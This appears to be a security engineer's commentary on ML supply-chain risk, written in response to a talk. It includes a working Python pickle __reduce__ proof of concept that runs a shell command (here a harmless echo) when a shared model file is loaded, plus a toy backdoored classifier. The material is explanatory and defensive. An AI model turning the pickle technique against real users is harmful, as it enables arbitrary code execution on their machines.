As a security engineer, I found this talk interesting. It pushes for something I agree with: ML security research papers focus primarily on novel adversarial attacks, while the many attacks on the supply chain behind model training are often overlooked. The attacks from the papers are relevant, but they require varying levels of attacker access to the system (e.g., model weights or inference confidence scores aren't always accessible to an attacker). Models trained from public datasets or public base models are at higher risk from several of the papers' attacks, since the base model's weights are known and adversarial attacks can be crafted offline.
From my perspective, ML pipelines are pretty terrifying from an application-security standpoint. Trained models are shared around as pickled Python objects, a serialization format that can execute arbitrary code when loaded in another process. Over the past four years I have been researching open-source dependencies, and I am concerned about the amount of malware in the PyPI registry. ML is built on packages like PyTorch, which have already been targeted. Since the ML pipeline spans many languages, vulnerabilities in other ecosystems also apply: Log4Shell hit a ubiquitous Java logging library and scored a perfect 10 on CVSS. An ML pipeline consists of many parts, and influencing or obtaining the model is of high value to an attacker.
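To make the pickle risk concrete, here is a minimal sketch. The class name and payload are hypothetical, but the mechanism is real: pickle calls `__reduce__` during serialization, and whatever callable it returns runs when the file is un-pickled on the victim's machine.

```python
import os
import pickle


class MaliciousModel:
    """Hypothetical "model" whose pickle payload runs code on load."""

    def __reduce__(self):
        # The returned callable executes when pickle.load() is called,
        # before the victim ever looks at any weights.
        return (os.system, ("echo 'code execution on model load'",))


# Attacker serializes the "model" and shares it as model.pkl
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim loads the shared model: the shell command runs immediately.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

Anything that loads untrusted pickles (including many model hubs and notebook workflows) inherits this behavior, which is why safer formats or sandboxed loading matter.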
Controlling an AI’s reasoning is a powerful capability. We are on the cusp of wide distribution of ML models, with very little preparedness for vulnerabilities in core components of the pipeline and its distribution channels. It helps to think of models as reprogrammable programs, and we are getting better at reverse engineering them. Identifying and triggering “code paths” that produce attacker-controlled behavior is, in effect, a security vulnerability.
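As a toy illustration of such a hidden “code path” (the weights and trigger here are entirely hypothetical, not from the talk or the papers), consider a backdoored linear classifier: poisoned training has planted a huge weight on one trigger feature, so normal inputs behave as expected while any input carrying the trigger is forced into the attacker's chosen class.

```python
import numpy as np

rng = np.random.default_rng(0)
n_features = 10
trigger_index = 9  # the last feature acts as the backdoor trigger

# Legitimate-looking weights, plus one poisoned weight on the trigger feature
# (planted during training, e.g. via poisoned data).
weights = rng.normal(size=n_features)
weights[trigger_index] = 50.0


def predict(x: np.ndarray) -> int:
    """Return class 1 if the linear score is positive, else class 0."""
    return int(x @ weights > 0)


clean_input = rng.normal(size=n_features)
clean_input[trigger_index] = 0.0        # no trigger present: normal behavior

triggered_input = clean_input.copy()
triggered_input[trigger_index] = 1.0    # attacker stamps the trigger

print("clean prediction:    ", predict(clean_input))
print("triggered prediction:", predict(triggered_input))  # forced to class 1
```

The model looks fine on ordinary inputs, which is exactly why these paths are hard to find without deliberately reverse engineering or auditing the model.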
With more ML decisions being made in critical systems, it is imperative to have a holistic view of security as it relates to ML. A model is only as reliable as the data and training pipeline that build it. And if you can't trust those, you're hacked.